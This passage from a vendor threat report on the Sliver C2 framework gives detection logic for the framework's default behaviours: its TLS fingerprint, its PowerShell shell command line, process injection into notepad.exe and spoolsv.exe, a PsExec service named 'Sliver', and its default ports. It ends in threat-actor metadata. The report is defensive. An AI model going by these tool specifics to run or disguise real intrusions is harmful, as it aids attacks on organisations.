indicators.  \r\nResponse to a request on the web root path of the Sliver C2 server\r\nUpon making a “wrong” request, we get this 400 error message: \r\nResponse to a malformed request\r\nThis can be used as a confirmation that the server is Sliver C2. It should be used in combination with the JARM\r\ndetection.\r\nDetection Logic \r\nJARM detection logic and process connects to a TLS service that answers “HTTP/1.1 400 Bad Request\r\nContent-Type: text/plain; charset=utf-8\r\nConnection: close“ \r\nfor malformed requests\r\nWireguard Server Listener\r\nBy default, Wireguard VPN server and therefore Sliver C2 wireguard listener is using the UDP port 51820. This\r\ncan lead to false positives and needs to be correlated with other findings.\r\nDetection Logic \r\nPublic IP address listening on UDP port 51820\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 42 of 47\n\nHunting for Sliver C2 Implants \r\nThe use of Sliver C2 generates many unique behaviors that can be used as detection triggers. In the following\r\ndiagram, we list all the detection techniques identified through this research.\r\nIn the following chapter, we dedicate one subchapter to each detection technique. Anyone can use and implement\r\nin their favorite security detection tool these detection methods, in order to spot the use of Sliver C2 in a specific\r\nenvironment.\r\nShell Feature - Detection of specific Powershell command line\r\nAs stated in the above chapters, Sliver C2 has a very unique way of spawning the powershell.exe process when the\r\nSliver C2 'Shell' command is executed for a specific implant.\r\nTo detect the use of the “Shell” feature of Sliver C2, it is possible to search look for any process spawning\r\npowershell.exe child process with a command line containing “-NoExit -Command [Console]::OutputEncoding=\r\n[Text.UTF8Encoding]::UTF8”.\r\nThe following detection logic sums up this rule:\r\nDetection Logic \r\nProcess name is powershell.exe with a command line that contains  “-NoExit -Command\r\n[Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8”\r\nSliver Execute-Assembly or Migrate Feature \r\nSliver C2 migrate command by default injects the implant binary into newly created notepad.exe processes and\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 43 of 47\n\ncreates a remote thread to run the malicious code.\r\nEvent ID 8 related to CreateRemoteThread detection. \r\nRemote thread creation log inside notepad.exe, as seen from a Sysmon event log\r\nDetection Logic \r\nDetect call(s) to the CreateRemoteThread Windows API to run code inside another process named notepad.exe\r\nSliver GetSystem Detection \r\nWhen the Sliver C2 getsystem command is executed from the administration panel, we identified that the process\r\nhosting the current implant will systematically inject itself into the spoolsv.exe process.\r\nHosted injected thread (CreateRemoteThread) from any process to spoolsv.exe.\r\nDetection Logic \r\nDetect call(s) to the CreateRemoteThread Windows API to run code inside another process named spoolsv.exe\r\nPsExec Feature Detection \r\nSliver C2 built-in PsExec command, used for lateral movements, creates a service on remote machine with default\r\nname “Sliver.”\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 44 of 47\n\nService creation with the name “Sliver”\r\nDetection Logic \r\nProcess creates remote Windows service containing the name “Sliver” \r\nSliver C2 payloads in C:\\Windows\\Temp\r\nWithout any customization, Sliver delivers its payloads remotely in the C:\\Windows\\Temp directory.\r\nAlthough it might lead to false-positives, searching for suspicious/injected processes using any image file stored\r\nin this folder can identify the use of Sliver C2.\r\nDetection Logic \r\nProcess creates executable file or script in C:\\Windows\\Temp directory\r\nOR \r\nProcess created from an image file residing in the C:\\Windows\\Temp directory\r\nSpecific Network Port Communication \r\nSliver C2 server listens on default ports if not instructed otherwise : \r\nTCP Port 8888 for the mTLS service\r\nUDP Port 51820 for the Wireguard service\r\nTCP Port 443 for the HTTPS service\r\nThe communications on port 443 are too common to be a detection factor. However, communications on ports\r\nTCP/8888 and UDP/51820 could be detection opportunities.\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 45 of 47\n\nWe can also add another criteria, which is the fact that the process initiating the connection is either suspicious\r\n(randomly, unsigned executable) or the result of a process injection (see GetSystem or Migrate features).\r\nCommunication on TCP port 8888\r\nmTLS connection default on TCP port 8888. As stated above, this can be used to create a detection logic:\r\nDetection Logic \r\nProcess has TLS encrypted network connections with a TCP service on TCP port 8888\r\nCommunication on UDP port 51820\r\nWireguard VPN default port is UDP 51820, this information can be used to detect Sliver C2 implant\r\ncommunication.\r\nDetection Logic \r\nProcess has network connections with a UDP service on UDP port 51820\r\nCybereason Recommendations\r\nTo efficiently detect Sliver C2 attacks, Cybereason recommends the following:\r\nEnable both the Signature and Artificial Intelligence (AI) modes on the Cybereason NGAV, alongside with\r\nthe Detect and Prevent modes of this feature.\r\nIn your sensor policy, navigate to Behavioral Execution Prevention (BEP) and set both BEP and Variant\r\nPayload Prevention to Prevent\r\nHandle with caution files originating from external sources (Email, Web browsing).\r\nThreat Hunting with Cybereason: The Cybereason MDR team provides its customers with custom hunting\r\nqueries for detecting specific threats - to find out more about threat hunting and Managed Detection and\r\nResponse with the Cybereason Defense Platform, contact a Cybereason Defender here.\r\nFor Cybereason customers: You can find more details available on the NEST including custom threat hunting\r\nqueries for detecting this threat.\r\nCybereason is dedicated to teaming up with Defenders to end cyber attacks from endpoints to enterprise ang to\r\neverywhere. Learn more about Cybereason XDR powered by Google Chronicle, check out our Extended\r\nDetection and Response (XDR) Toolkit, or schedule a demo today to learn how your organization can benefit\r\nfrom an operation-centric approach to security.\r\nAbout The Researchers \r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 46 of 47\n\nLoïc Castel, Incident Response Investigator, Cybereason Incident Response Team\r\nLoïc Castel is an IR investigator with the Cybereason Incident Response team. Loïc analyses and researches\r\ncritical incidents and cybercriminals. In his career, Loïc worked as a security auditor in well-known organizations\r\nsuch as ANSSI (French National Agency for the Security of Information Systems) and as Lead Digital Forensics\r\n\u0026 Incident Response at Atos. Loïc loves digital forensics and incident response, but is also interested in offensive\r\naspects such as vulnerability research.\r\nMeroujan Antonyan, Senior Security Analyst, Cybereason Global SOC \r\nMeroujan Antonyan is a Senior Security Analyst with the Cybereason Global SOC team. Meroujan hunts for\r\nemerging threats and analyzes incidents in order to improve hunting techniques and procedures. He contributes in\r\nautomation and interconnection of various cybersecurity projects to collect and leverage threat intelligence and\r\nbring value from security events. Meroujan has Digital Forensics \u0026 Incident Response experience and is\r\ninterested in low level malware development, oriented towards improving security solutions capabilities.\r\nSource: https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\r\nPage 47 of 47", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA" ], "references": [ "https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors" ], "report_names": [ "sliver-c2-leveraged-by-many-threat-actors" ], "threat_actors": [ { "id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f", "created_at": "2022-10-25T15:50:23.579601Z", "updated_at": "2026-04-10T02:00:05.360509Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "TA551", "GOLD CABIN", "Shathak" ], "source_name": "MITRE:TA551", "tools": [ "QakBot", "IcedID", "Valak", "Ursnif" ], "source_id": "MITRE", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4594f985-865e-4862-8047-2e80226e246a", "created_at": "2022-10-27T08:27:12.984825Z", "updated_at": "2026-04-10T02:00:05.293575Z", "deleted_at": null, "main_name": "EXOTIC LILY", "aliases": [ "EXOTIC LILY" ], "source_name": "MITRE:EXOTIC LILY", "tools": [ "Bazar" ], "source_id": "MITRE", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "40b623c7-b621-48db-b55b-dd4f6746fbc6", "created_at": "2024-06-19T02:03:08.017681Z", "updated_at": "2026-04-10T02:00:03.665818Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shathak", "TA551 " ], "source_name": "Secureworks:GOLD CABIN", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "90f216f2-4897-46fc-bb76-3acae9d112ca", "created_at": "2023-01-06T13:46:39.248936Z", "updated_at": "2026-04-10T02:00:03.260122Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shakthak", "TA551", "ATK236", "G0127", "Monster Libra" ], "source_name": "MISPGALAXY:GOLD CABIN", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "56384d06-abc2-4853-8440-db4d7b7d1b5f", "created_at": "2023-01-06T13:46:39.367122Z", "updated_at": "2026-04-10T02:00:03.303733Z", "deleted_at": null, "main_name": "EXOTIC LILY", "aliases": [ "DEV-0413" ], "source_name": "MISPGALAXY:EXOTIC LILY", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68", "created_at": "2022-10-25T16:07:24.578896Z", "updated_at": "2026-04-10T02:00:05.039955Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "G0127", "Gold Cabin", "Monster Libra", "Shathak", "TA551" ], "source_name": "ETDA:TA551", "tools": [ "BokBot", "CRM", "Gozi", "Gozi CRM", "IceID", "IcedID", "Papras", "Snifula", "Ursnif", "Valak", "Valek" ], "source_id": "ETDA", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434942, "ts_updated_at": 1775792252, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2f1804f3ba7112c546ac39ca9576afb1bf2b4e91.pdf", "text": "https://archive.orkl.eu/2f1804f3ba7112c546ac39ca9576afb1bf2b4e91.txt", "img": "https://archive.orkl.eu/2f1804f3ba7112c546ac39ca9576afb1bf2b4e91.jpg" } }